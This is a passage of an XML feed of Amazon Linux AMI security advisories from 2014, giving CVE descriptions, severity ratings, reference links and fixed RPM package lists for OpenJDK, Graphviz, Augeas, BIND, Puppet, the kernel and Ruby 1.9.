CVE-2013-5884:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-5878:
Multiple improper permission check issues were discovered in the Serviceability, Security, CORBA, JAAS, JAXP, and Networking components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5878" title="" id="CVE-2013-5878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5884" title="" id="CVE-2013-5884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5896" title="" id="CVE-2013-5896" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907" title="" id="CVE-2013-5907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5910" title="" id="CVE-2013-5910" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0368" title="" id="CVE-2014-0368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0373" title="" id="CVE-2014-0373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0376" title="" id="CVE-2014-0376" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0411" title="" id="CVE-2014-0411" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0416" title="" id="CVE-2014-0416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0422" title="" id="CVE-2014-0422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0423" title="" id="CVE-2014-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0428" title="" id="CVE-2014-0428" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0097.html" title="" id="RHSA-2014:0097" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-66.1.13.1.62.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="66.1.13.1.62.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-66.1.13.1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-284</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-284: medium priority package update for graphviz</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-tcl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package 
name="graphviz-graphs" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="6.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/graphviz-python-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.30.1-6.30.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.30.1-6.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-285</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-285: medium priority package update for graphviz-php</title><issued date="2014-02-03 15:27:00" /><updated date="2014-09-16 22:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.30.1" release="6.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.30.1-6.30.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.30.1" release="6.30.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.30.1-6.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-286</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-286: medium priority package update for augeas</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 22:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6412:
A flaw was found in the way Augeas handled certain umask settings when creating new configuration files. This flaw could result in configuration files being created as world writable, allowing unprivileged local users to modify their content.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6412" title="" id="CVE-2013-6412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0044.html" title="" id="RHSA-2014:0044" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="augeas" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-devel-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-libs-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/augeas-debuginfo-1.0.0-5.7.amzn1.x86_64.rpm</filename></package><package name="augeas" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-debuginfo" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-debuginfo-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-devel" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-devel-1.0.0-5.7.amzn1.i686.rpm</filename></package><package name="augeas-libs" version="1.0.0" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/augeas-libs-1.0.0-5.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-287</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-287: medium priority package update for bind</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 
22:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0591:
A denial of service flaw was found in the way BIND handled queries for NSEC3-signed zones. A remote attacker could use this flaw against an authoritative name server that served NSEC3-signed zones by sending a specially crafted query, which, when processed, would cause named to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0591" title="" id="CVE-2014-0591" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0043.html" title="" id="RHSA-2014:0043" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.23.rc1.32.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" 
release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.23.rc1.32.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.23.rc1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-288</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-288: low priority package update for puppet</title><issued date="2014-02-03 15:28:00" /><updated date="2014-09-16 22:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4969:
Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) before 2.8.4 and 3.1 before 3.1.1 allows local users to overwrite arbitrary files via a symlink attack on unspecified files.
1045212:
CVE-2013-4969 Puppet: Unsafe use of Temp files in File type
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4969" title="" id="CVE-2013-4969" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-debuginfo" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.25" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.25-1.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.25-1.2.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.25-1.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.25" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.25-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-289</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-289: medium priority package update for kernel</title><issued date="2014-02-26 14:26:00" /><updated date="2014-09-16 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1874:
1062356:
CVE-2014-1874 Kernel: SELinux: local denial-of-service
CVE-2014-0069:
1064253:
CVE-2014-0069 kernel: cifs: incorrect handling of bogus user pointers during uncached writes
CVE-2013-7265:
The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.
1035875:
CVE-2013-7263 CVE-2013-7265 Kernel: net: leakage of uninitialized memory to user-space via recv syscalls
CVE-2013-7263:
The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c.
1035875:
CVE-2013-7263 CVE-2013-7265 Kernel: net: leakage of uninitialized memory to user-space via recv syscalls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7263" title="" id="CVE-2013-7263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7265" title="" id="CVE-2013-7265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0069" title="" id="CVE-2014-0069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1874" title="" id="CVE-2014-1874" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.82" release="69.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.82-69.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.4.82" release="69.112.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.82" release="69.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.82-69.112.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.82" release="69.112.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.4.82-69.112.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-290</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-290: medium priority package update for ruby19</title><issued date="2014-02-26 14:27:00" /><updated date="2014-09-16 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4363:
Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION_PATTERN in lib/rubygems/version.rb in RubyGems before 1.8.23.2, 1.8.24 through 1.8.26, 2.0.x before 2.0.10, and 2.1.x before 2.1.5, as used in Ruby 1.9.0 through 2.0.0p247, allows remote attackers to cause a denial of service (CPU consumption) via a crafted gem version that triggers a large amount of backtracking in a regular expression. NOTE: this issue is due to an incomplete fix for CVE-2013-4287.
1009720:
CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability, incomplete CVE-2013-4287 fix
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4363" title="" id="CVE-2013-4363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem19-bigdecimal" version="1.1.0" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.60.amzn1.noarch.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.60.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.545" release="32.60.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.545-32.60.amzn1.x86_64.rpm</filename></package><package name="ruby19-irb" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.545-32.60.amzn1.noarch.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.545" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.545" release="32.60.amzn1" epoch="0" 
